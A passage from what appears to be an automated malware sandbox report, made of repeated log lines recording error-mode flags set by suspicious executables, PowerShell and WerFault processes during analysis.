                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
